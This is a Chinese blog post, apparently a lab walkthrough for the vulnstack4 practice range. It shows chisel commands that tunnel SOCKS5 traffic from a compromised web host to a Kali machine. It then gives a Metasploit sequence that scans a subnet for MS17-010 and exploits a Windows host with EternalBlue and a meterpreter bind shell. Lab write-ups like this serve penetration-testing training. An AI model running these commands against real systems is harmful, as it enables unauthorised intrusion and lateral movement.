vulnstack4渗透-内网篇

chisel+msf攻入内网在kali上下载chisel再上传到Ubuntu上目标服务器开启服务端./chisel_1.7.6_linux_amd64 server -p 2333 --socks5攻击机kali开启客户端./chisel_1.7.6_linux_amd64 client 192.168.142.139:2333 socks攻击机1080端口开启了socks5监听。即实现将被拿下的目标web机上2333端口的流量转发到攻击机kali的1080端口。永.
摘要由CSDN通过智能技术生成

 chisel+msf攻入内网

在kali上下载chisel再上传到Ubuntu上

目标服务器开启服务端

./chisel_1.7.6_linux_amd64 server -p 2333 --socks5

攻击机kali开启客户端

./chisel_1.7.6_linux_amd64 client 192.168.142.139:2333 socks

攻击机1080端口开启了socks5监听。即实现将被拿下的目标web机上2333端口的流量转发到攻击机kali的1080端口。

永恒之蓝横向渗透攻击

search ms17_010

use auxiliary/scanner/smb/smb_ms17_010

set rhosts 192.168.183.0/24

set threads 50

先扫描ip哪些存在此漏洞,发现192.168.183.1,192.168.183.128两个ip存在

对192.168.183.128进行攻击

set Proxies socks5:127.0.0.1:1080
     #msf全局把代理指向127.0.0.1:1080(攻击机1080端口进行socks5监听)
use exploit/windows/smb/ms17_010_eternalblue   #加载渗透攻击模块
set payload windows/x64/meterpreter/bind_tcp   #因为使用代理所以正向监听
                                                              
set  AutoRunScript post/windows/manage/migrate  #自动化后渗透测试,执行
                                                                 #   一次就可以获得对目标的控制权限
set rhost    192.168.183.128 #设置内网域成员为目标机
set lport 4444  #设置监听端口
run

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值